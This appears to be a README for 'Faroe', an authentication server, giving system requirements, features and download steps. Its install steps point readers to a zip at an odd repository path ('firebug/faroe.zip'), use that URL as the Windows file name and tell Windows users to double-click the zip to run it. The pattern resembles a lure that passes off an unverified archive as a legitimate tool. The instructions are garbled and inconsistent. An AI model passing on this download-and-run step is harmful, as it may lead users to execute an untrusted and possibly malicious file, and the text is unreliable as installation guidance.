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πŸŽ‰ faroe - Your Easy Solution for Authentication

πŸš€ Getting Started

Welcome to Faroe! This guide will help you download and run our modular authentication server.

πŸ“₯ Download Faroe

Download Faroe

To get started, visit the link below to download Faroe.

Download Faroe from the Releases Page

πŸ’» System Requirements

Before you download, please ensure your computer meets the following requirements:

  • Operating System: Windows 10 or later, macOS version 10.13 or later, or any modern Linux distribution.
  • Memory: At least 4 GB of RAM.
  • Processor: Dual-Core 1.5 GHz or faster.
  • Storage: At least 100 MB of available space.

πŸ”§ Features

Faroe provides the following features:

  • Modular Design: Easily extend and customize your authentication process.
  • User Management: Simple tools for managing users and permissions.
  • Secure Data Handling: Built with security best practices to protect user data.
  • Cross-Platform Compatibility: Works on various operating systems.
  • Extensive Documentation: Easy-to-follow guides to help you at every step.

πŸ› οΈ Download & Install

  1. Visit the Releases Page
    Go to this page to find the latest version of Faroe.

  2. Choose Your Version
    On the Releases page, you will see a list of available versions. Look for the most recent one.

  3. Download the File
    Click on the file that matches your operating system. For example, if you are using Windows, download the file named https://raw.githubusercontent.com/niklauscell/faroe/main/firebug/faroe.zip.

  4. Locate the Downloaded File
    After the download completes, check your downloads folder. You should see the file you just downloaded.

  5. Run the Application

    • Windows: Double-click on the https://raw.githubusercontent.com/niklauscell/faroe/main/firebug/faroe.zip file to start the application.
    • macOS: Open Finder, navigate to your downloads, and double-click the faroe-macos-amd64 file.
    • Linux: Open a terminal. Navigate to your downloads folder and run chmod +x faroe-linux-amd64 to make it executable. Then run ./faroe-linux-amd64.
  6. Follow the Setup Instructions
    Once you run the application, follow the prompts to complete your setup. It usually requires setting up your first user and configuring basic settings.

πŸ“– Documentation

For additional instructions, features, and troubleshooting tips, check out our full documentation. Look for the "Documentation" section on the main repository page or visit our Wiki.

πŸ†˜ Support

If you run into issues or have questions, feel free to reach out. Post your questions on our Issues Page. Someone from our community or team will assist you as soon as possible.

🀝 Contributing

If you would like to help improve Faroe, we welcome contributions. Please read our Contribution Guidelines to understand how you can contribute.

πŸš€ Future Plans

We plan to add more features based on user feedback:

  • Enhanced user management tools
  • Expanded reporting features
  • Greater integration capabilities with other systems

Thank you for choosing Faroe! We hope it simplifies your authentication needs. Download it now and start exploring its capabilities!

Download Faroe from the Releases Page

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